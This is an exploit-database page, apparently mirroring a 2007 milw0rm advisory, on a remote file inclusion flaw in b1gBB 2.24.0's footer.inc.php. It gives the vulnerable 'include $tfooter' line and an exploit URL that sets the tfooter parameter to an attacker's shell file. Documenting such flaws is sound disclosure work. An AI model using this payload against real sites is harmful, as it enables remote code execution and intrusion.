header-logo
Suggest Exploit
vendor:
b1g Bulletion Board
by:
Rf7awy
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: b1g Bulletion Board
Affected Version From: 2.24.0
Affected Version To: 2.24.0
Patch Exists: NO
Related CWE:
CPE: a:b1gbb_project:b1g_bulletion_board:2.24.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion

The footer.inc.php file in b1gBB (b1g Bulletion Board) allows remote attackers to include arbitrary PHP files via the tfooter parameter in a footer.inc.php request, as demonstrated by including shell.php. This vulnerability can be exploited by an attacker to execute arbitrary code or disclose sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use proper input validation techniques to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

thanks
Mahmood_ali

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
     Tryag-Team

# milw0rm.com [2007-06-25]

Navigation

Suggest Exploit

Services By CQR